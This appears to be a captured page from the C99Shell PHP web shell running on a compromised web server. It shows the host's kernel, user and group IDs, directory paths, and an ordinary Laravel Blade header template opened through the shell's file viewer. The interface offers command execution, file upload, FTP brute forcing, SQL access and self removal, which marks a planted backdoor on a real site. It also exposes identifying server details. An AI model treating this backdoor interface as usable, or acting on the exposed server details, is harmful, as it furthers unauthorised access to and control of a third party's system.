!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/classify.picotech.app/public_html/resources/views/components/frontend/header/   drwxr-xr-x
Free 29.31 GB of 117.98 GB (24.85%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     header-bottom.blade.php (4.16 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@php
    $locale = app()->getLocale();
@endphp
<div class="header-bottom hidden lg:!block bg-primary-800 dark:bg-gray-800">
    <div class="container">

        <div class="flex gap-6 items-center">
            <div class="cat-menu text-white/80 overflow-visible">
                <button
                    class="inline-flex gap-2 items-center py-3 heading-07 transition-all duration-300 hover:text-white">
                    <x-svg.all-category-icon />
                    <span class="whitespace-nowrap">{{ __('all_category') }}</span>
                </button>
                <div class="cat-submenu flex flex-col gap-3">
                    <h3 class="heading-07 text-gray-900 dark:text-gray-100"><a href="/ads">{{ __('all_category') }}</a></h3>
                    <ul class="flex flex-col gap-3">
                        @foreach (loadCategoriesSubcategories() as $category)
                            <li>
                                <a href="{{ route('frontend.ads.category', $category['slug']) }}"
                                    class="cat-submenu-link block body-md-400 text-gray-700 dark:text-gray-300 hover:text-primary-500 transition-all duration-300">
                                    <span
                                        class="relative">{{ $category['translations']['category'][$locale] ?? $category['name'] }}</span>
                                </a>
                                @if ($category['subcategories'] && count($category['subcategories']))
                                    <div class="cat-sub-submenu flex flex-col gap-3">
                                        <h3 class="heading-07 text-gray-900"></h3>
                                        <ul class="flex flex-col gap-3">
                                            @foreach ($category['subcategories'] as $subcategory)
                                                <li>
                                                    <a href="{{ route('frontend.ads.sub.category', ['slug' => $category['slug'], 'subslug' => $subcategory['slug']]) }}"
                                                        class="body-md-400 text-gray-700 dark:text-gray-300 hover:text-primary-500 transition-all duration-300">
                                                        {{ $subcategory['translations'][$locale] ?? $subcategory['name'] }}
                                                    </a>
                                                </li>
                                            @endforeach
                                        </ul>
                                    </div>
                                @endif
                            </li>
                        @endforeach
                    </ul>
                </div>
            </div>
            <div class="swiper category-slider relative text-white/80">
                <div class="swiper-wrapper overflow-hidden flex items-center">
                    @foreach (loadCategoriesSubcategories() as $category)
                        <div class="swiper-slide whitespace-nowrap max-w-max inline-flex py-[13px]">
                            <a href="{{ route('frontend.ads.category', $category['slug']) }}"
                                class="heading-07 transition-all duration-300 hover:text-white">
                                {{ $category['name'] }}
                            </a>
                        </div>
                    @endforeach
                </div>
                <div class="slider-navigation__wrap text-left">
                    <div
                        class="category-slider_prev cursor-pointer inline-flex items-center bg-white w-[22px] h-[22px] rounded-full p-[5px]">
                        <x-svg.right-icon stroke="#1768E0" class="rtl:rotate-180" />
                    </div>
                </div>
                <div class="slider-navigation__wrap text-left">
                    <div
                        class="category-slider_next cursor-pointer inline-flex items-center bg-white w-[22px] h-[22px] rounded-full p-[5px]">
                        <x-svg.right-icon stroke="#1768E0" class="rtl:rotate-180" />
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0036 ]--